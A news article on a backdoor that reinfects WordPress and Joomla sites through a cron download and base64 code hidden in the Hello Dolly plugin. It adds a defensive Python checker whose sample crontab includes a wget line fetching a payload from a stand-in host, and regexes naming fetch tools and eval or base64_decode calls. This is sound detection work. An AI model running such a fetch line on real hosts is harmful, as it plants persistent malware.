WordPress and Joomla websites infected by new backdoor malware

A new backdoor malware has been found re-infecting files even after website owners have cleaned their websites. It primarily targets WordPress-based and Joomla-based websites to initiate its infection process.

WordPress-based and Joomla-based websites are under attack, as a new backdoor malware has been found re-infecting files even after the website owners have cleaned their websites.

The attack came to light through a report from Sucuri, which stated that the malware’s persistence on a website was “being created by a cron that was scheduled to download malware from a third party domain.”

Because the malware's source code is configured to detect only WordPress-based and Joomla-based websites, these are the primary targets. The malware also determines the method it will use to further infect the website files based on the type of platform.

According to Sucuri researchers, the malware infected the website of one of its clients, which was using WordPress. It abused the default ‘Hello Dolly’ WordPress plugin to further its infection process.

“The malware proceeded to preserve the existing timestamps of the default WordPress plugin “Hello, Dolly”, then attempts to hide base64 encoded malware to the plugin file ./wp-content/plugins/hello.php,” said the Sucuri researchers in a blog post.

The backdoor malware maintained its foothold despite the sanitation process on the website.
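
A defender's check for the two persistence points described above, added here as an example and not taken from Sucuri's report: it flags cron entries that download from a remote URL, and it inspects a plugin file by content hash and base64 markers rather than by modification time, since the timestamps were preserved. The sample crontab, plugin bytes, domain, function names and regex heuristics are all constructed assumptions.

```python
import base64
import hashlib
import re

# Heuristic (assumption): a cron entry that fetches a remote URL deserves review.
FETCH_RE = re.compile(r"\b(wget|curl|fetch|lwp-download)\b[^#\n]*https?://", re.I)
# Long unbroken base64 runs are unusual in hand-written plugin source.
B64_RE = re.compile(r"[A-Za-z0-9+/]{80,}={0,2}")
DECODE_RE = re.compile(r"\b(base64_decode|eval|gzinflate|str_rot13)\s*\(", re.I)


def suspicious_cron_lines(crontab_text):
    """Return non-comment cron lines that download from a remote URL."""
    hits = []
    for line in crontab_text.splitlines():
        stripped = line.strip()
        if stripped and not stripped.startswith("#") and FETCH_RE.search(stripped):
            hits.append(stripped)
    return hits


def plugin_findings(php_source: bytes, known_good_sha256: str):
    """Check plugin content, not mtime: the malware preserved the timestamps."""
    findings = []
    if hashlib.sha256(php_source).hexdigest() != known_good_sha256:
        findings.append("hash-mismatch")
    text = php_source.decode("utf-8", errors="replace")
    if B64_RE.search(text):
        findings.append("long-base64-blob")
    if DECODE_RE.search(text):
        findings.append("decode-or-eval-call")
    return findings


# Constructed sample data (not taken from the Sucuri report).
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/php /var/www/html/wp-cron.php
*/10 * * * * wget -q -O /tmp/x http://third-party.example.invalid/p.txt
"""
CLEAN_PLUGIN = b"<?php\n/* Plugin Name: Hello Dolly */\nfunction hello_dolly() {}\n"
PAYLOAD = base64.b64encode(b"constructed placeholder, not real malware " * 4)
TAMPERED_PLUGIN = CLEAN_PLUGIN + b"$p = base64_decode('" + PAYLOAD + b"');\n"
CLEAN_SHA256 = hashlib.sha256(CLEAN_PLUGIN).hexdigest()

if __name__ == "__main__":
    print(suspicious_cron_lines(SAMPLE_CRONTAB))
    print(plugin_findings(TAMPERED_PLUGIN, CLEAN_SHA256))
```

In practice the known-good hash would come from a clean copy of the plugin for the installed version, and every user's crontab on the host would be checked, because cleaning the files alone leaves the scheduled download in place.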